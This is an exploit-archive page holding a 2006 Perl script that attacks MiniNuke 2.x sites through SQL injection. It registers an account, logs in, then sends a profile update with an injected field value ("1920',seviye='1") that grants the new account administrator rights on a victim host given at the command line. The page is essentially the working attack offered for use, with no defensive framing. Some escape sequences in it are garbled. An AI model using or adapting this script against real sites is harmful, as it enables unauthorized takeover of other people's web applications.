[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MiniNuke 2.x (create an admin) Remote SQL Injection Exploit
# Published : 2006-05-27
# Author : nukedx
# Previous Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Next Title : Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "n- NukedX Security Advisory Nr.2006-31rn";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploitrn";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>rn";
print "- <host> -> Victim's host ex: www.victim.comrn";
print "- <path> -> Path to MiniNuke ex: /mininuke/rn";
print "- <user> -> Desired username to create ex: h4x0rrn";
print "- <pass> -> Password for our username ex: p4ZZw0rdrn";
print "- <mail> -> Mail for our username ex: hax0r@s3x0r3d.comrn";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http://)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserverrn";
getsession();
}
sub getsession ()
{
print "- Getting session for register...rn";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mns "GET $mnsreq HTTP/1.1n";
print $mns "Accept: */*n";
print $mns "Referer: $mnhostn";
print $mns "Accept-Language: trn";
print $mns "User-Agent: NukeZillan";
print $mns "Cache-Control: no-cachen";
print $mns "Host: $mnservern";
print $mns "Connection: closenn";
print "- Connected...rn";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=//) { $mncookie = $mncookie.$1; }
if ($answer =~ /G¨¹venlik Kodunuz</td><td width="50%"><b>(.*?)</b></td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failedrn";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting donern";
print "- Lets create our user...rn";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mn "POST $mnreq HTTP/1.1rn";
print $mn "Accept: */*rn";
print $mn "Referer: $mnhostrn";
print $mn "Accept-Language: trrn";
print $mn "Content-Type: application/x-www-form-urlencodedrn";
print $mn "Accept-Encoding: gzip, deflatern";
print $mn "User-Agent: NukeZillarn";
print $mn "Cookie: $mncookiern";
print $mn "Host: $mnserverrn";
print $mn "Content-length: $mndatalenrn";
print $mn "Connection: Keep-Alivern";
print $mn "Cache-Control: no-cachernrn";
print $mn $mndata;
print $mn "rnrn";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...rn";
print "- Loginning in to user...rn";
dologin();
}
}
#if you are here...
die "- Exploit failedrn";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mnl "POST $mnlreq HTTP/1.1rn";
print $mnl "Accept: */*rn";
print $mnl "Referer: $mnhostrn";
print $mnl "Accept-Language: trrn";
print $mnl "Content-Type: application/x-www-form-urlencodedrn";
print $mnl "Accept-Encoding: gzip, deflatern";
print $mnl "User-Agent: NukeZillarn";
print $mnl "Host: $mnserverrn";
print $mnl "Content-length: $mnldatalenrn";
print $mnl "Connection: Keep-Alivern";
print $mnl "Cache-Control: no-cachernrn";
print $mnl $mnldata;
print $mnl "rnrn";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failedrn";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..rn";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mnp "POST $mnpreq HTTP/1.1rn";
print $mnp "Accept: */*rn";
print $mnp "Referer: $mnhostrn";
print $mnp "Accept-Language: trrn";
print $mnp "Content-Type: application/x-www-form-urlencodedrn";
print $mnp "Accept-Encoding: gzip, deflatern";
print $mnp "User-Agent: NukeZillarn";
print $mnp "Cookie: $mnlcookiern";
print $mnp "Host: $mnserverrn";
print $mnp "Content-length: $mnpdatalenrn";
print $mnp "Connection: Keep-Alivern";
print $mnp "Cache-Control: no-cachernrn";
print $mnp $mnpdata;
print $mn "rnrn";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...rn";
print "- Exploiting finished succesfullyrn";
print "- Your username $mnuser has been created as adminrn";
print "- You can login with password $mnpass on $mnlreqrn";
exit();
}
if ($answer =~ /¨¹yeler A?yktyr/) {
print "- Exploit failedrn";
exit();
}
}
#if you are here...
die "- Exploit failedrn";
}
# nukedx.com [2006-05-27]
# www.Syue.com [2006-05-27]